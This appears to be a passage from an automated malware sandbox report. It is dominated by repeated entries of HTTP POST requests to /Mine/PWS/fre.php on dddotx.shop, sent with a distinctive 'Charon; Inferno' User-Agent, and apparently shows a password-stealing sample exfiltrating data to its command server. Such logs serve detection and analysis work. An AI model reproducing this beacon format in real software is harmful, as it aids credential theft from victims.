                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00404ED4 recv,2_2_00404ED4
                Source: global trafficDNS traffic detected: DNS query: dddotx.shop
                Source: unknownHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 176Connection: close
